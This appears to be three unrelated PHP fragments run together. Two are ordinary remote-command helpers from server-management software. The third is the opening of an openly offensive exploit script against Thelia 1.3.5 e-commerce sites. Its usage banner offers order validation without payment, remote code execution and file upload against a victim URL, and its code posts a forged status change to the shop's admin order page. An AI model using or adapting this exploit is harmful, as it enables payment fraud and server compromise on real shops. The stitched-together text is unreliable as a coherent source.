* along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, * MA 02110-1301, USA. \*******************************************************************/ define('GS_VALID', true); /// this is a parent file require_once dirName(__FILE__) . '/../inc/conf.php'; require_once GS_DIR . 'inc/remote-exec.php'; if ($argc != 4) { echo 'Usage: ', baseName($argv[0]), " <host> <command> <timeout>\n"; die(1); } $host = trim($argv[1]); $cmd = trim($argv[2]); $timeout = (int) trim($argv[3]); remote_exec($host, $cmd, $timeout, $out, $err); echo implode("\n", $out), "\n"; if ($err == 0) { $errMsg = 'OK'; } elseif ($err == 119) { $errMsg = 'SSH ASKS FOR PASSWORD'; } elseif ($err == 118) { $errMsg = 'SSH ASKS FOR PASSPHRASE'; } elseif ($err == 117) { $errMsg = 'NO ROUTE TO HOST'; } elseif ($err == 116) { $errMsg = 'CONNECTION REFUSED'; } elseif ($err == 110) { $errMsg = 'TIMEOUT'; } elseif ($err == 120) { $errMsg = 'UNKNOWN REMOTE EXEC ERROR';
/** * @return void * @param * @param * @desc Remote or local exec. Either exectues it locally or calles remote exec depending on whether $syncserver is localhost or not. */ function rl_exec($masterserver, $slaveserver, $cmd) { global $gbl, $sgbl, $login, $ghtml; // Convert to driverapp here. Only here do we have the full information (masterserver/syncserver) to to get the syntosystem class properly. if ($cmd->action === "set" || $cmd->action === 'dowas') { $robject = $cmd->robject; $clo = myclone($robject); //dprint("Just before $robject {$robject->nname} " . $robject->domain_l . "<br> "); lxclass::clearChildrenAndParent($clo); $clo->syncserver = $slaveserver; $clo->createSyncClass(); //dprint("Just after $robject {$robject->nname} " . $robject->domain_l . "<br> "); $cmd->robject = $clo; } if (!$masterserver || $masterserver === "localhost") { $cmd->slaveserver = null; if (!isset($gbl->pserver_password) && isset($cmd->slave_password)) { $gbl->pserver_password = $cmd->slave_password; } $result = remote_exec($slaveserver, $cmd); } else { $cmd->slaveserver = $slaveserver; $result = remote_exec($masterserver, $cmd); } return $result; }
if ($argc < 3) { echo "\n=___________ Thelia 1.3.5 Multiple Vulnerability Exploit _____________=\n========================================================================\n| Black_H <*****@*****.**> |\n| URL: http://blackh.free.fr - http://blackh.eu |\n========================================================================\n| \$system> {$argv['0']} -url <> -a <1,2,3> -n <> -f <> |\n| Notes: -url ex: http://victim.com/site/ |\n| -a 1 : Validate Command without Payment |\n| -n Commmand number (ex: CDE5627JOC ) |\n| 2 : Remote Code Execution |\n| -n Rubrique id (ex: 1 ) |\n| 3 : Remote File Upload |\n| -n Rubrique id (ex: 1 ) |\n| -f Name of file (ex: leet.php ) |\n| For 2 and 3, the '/client/' directory must not be forbidden |\n========================================================================\n"; exit(1); } $url = getparam('url', 1); $action = getparam('a', 1); $n = getparam('n', 1); $f = getparam('f', 0); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); switch ($action) { case '1': valid_command($n); break; case '2': remote_exec($n); break; case '3': remote_upload($n, $f); break; default: die('Please choose an action.'); break; } # Validate Command without Payment function valid_command($n) { global $xpl, $url; echo "\n[-] Change command statut"; echo "\n[-] Command: " . $n; if ($xpl->post($url . 'admin/commande_details.php?ref=' . $n, 'ref=' . $n . '&statutch=2')) {